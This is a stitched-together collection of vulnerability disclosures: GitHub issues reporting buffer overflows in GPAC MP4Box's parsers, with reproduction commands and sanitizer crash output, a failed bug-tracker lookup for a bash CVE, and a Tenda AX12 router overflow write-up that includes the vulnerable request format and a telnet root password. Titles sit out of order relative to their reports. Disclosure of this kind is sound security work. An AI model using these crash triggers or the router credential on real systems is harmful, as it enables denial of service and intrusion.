	pps->num\_tile\_cols++;
}

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof3.mp4
    

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10964:28: runtime error: index 30 out of bounds for type 'u32 [30]'

CVE-2022-47088: Another Buffer overflow in gf_vvc_read_pps_bs_internal function of media_tools/av_parsers.c · Issue #2340 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in hevc\_parse\_vps\_extension function of media\_tools/av\_parsers.c

for (i = 0; i < (num\_scalability\_types - splitting\_flag); i++) {
  dimension\_id\_len\[i\] = 1 + gf\_bs\_read\_int\_log\_idx(bs, 3, "dimension\_id\_len\_minus1", i); // overflow at dimension\_id\_len
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof6.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:7633:19: runtime error: index 16 out of bounds for type 'u8 [16]'
    

**POC**

poc\_bof6.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47095: Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c · Issue #2346 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow in gf_text_process_sub function of filters/load_text.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in gf\_text\_process\_sub function of filters/load\_text.c

while (szLine\[i+1+j\] && szLine\[i+1+j\]!='}') {
	szTime\[i\] = szLine\[i+1+j\]; // overflow at szTime
	i++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof5.avi
    

Crash reported by sanitizer

    Track Importing Timed Text - Text track 400 x 60 font Serif (size 18) layer 0
    [TXTIn] Bad SUB file - expecting "{" got "{"
    [TXTIn] corrupted SUB frame (line 2) - ends (at 0 ms) before start of current frame (6 ms) - skipping
    filters/load_text.c:2569:10: runtime error: index 20 out of bounds for type 'char [20]'
    

**POC**

poc\_bof5.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47091: Buffer overflow in gf_text_process_sub function of filters/load_text.c · Issue #2343 · gpac/gpac

A flaw was found in the bash package, where a heap-buffer overflow can occur in valid parameter_transform. This issue may lead to memory problems.

'2126720?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-3715: Invalid Bug ID

There is an unauthorized buffer overflow vulnerability in Tenda AX12 v22.03.01.21 _ cn. This vulnerability can cause the web service not to restart or even execute arbitrary code. It is a different vulnerability from CVE-2022-2414.

**Tenda AX12 unauthorized Buffer overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address ：https://www.tenda.com.cn/download/detail-3237.html

**Vulnerability information**

There is an unauthorized buffer overflow vulnerability in tenda ax12v22.03.01.21 \_ cn, which can cause httpd to crash. Using this vulnerability can cause the web service not to restart or even execute arbitrary code. It is a different vulnerability from CVE-2022-2414.

**Affected version**

Figure shows the latest firmware ：V22.03.01.21\_cn of the router

**Vulnerability details**

open telnet http://192.168.0.1/goform/telnet telnet admin/password is root/ Fireitup

using ida to analysis httpd, in function sub\_4335C0, the corresponding function field is fast\_setting\_wifi\_set.

The program passes the contents obtained by the ssid parameter to V2 Then, format the matching content of V2 through the sprintf function into V19. There is no size check, so there is a vulnerability that can cause buffer overflow through ssid field.

**Vulnerability exploitation condition**

However, there are certain utilization conditions here, and it can be found in the function sub\_417D94 that the field fast\_setting\_wifi\_set will be checked.

The corresponding function of fast\_setting\_wifi\_set is to initialize the network function when the device is started, and this function can only be triggered when the device is started initially or after reset. The data packet sent with this function during the normal operation of the device will not be processed, because it is filtered by the function in the above figure.

When the device is initially started, the web password is empty, so it can be used without authorization.

The functional data packets are as follows, and we will use this to construct poc.

POST /goform/fast\_setting\_wifi\_set HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 111
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/index.html

ssid=Tenda\_FDDE58&wrlPassword=mima1234&power=high&timeZone=%2B08%3A00&loginPwd=70ebc4f9c9d22827a5874d1bb6f06abd

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Connect physical devices
2.  Attack with the following POC

The reproduction results are as follows:

Figure shows POC attack effect, the binary httpd restarts.

Running exp without logging in can also attack, and several more attacks will cause httpd to restart all the time.

Finally, through observation, we found that httpd will not restart after several attacks.

**CVE-ID**

unsigned

Tag

#buffer_overflow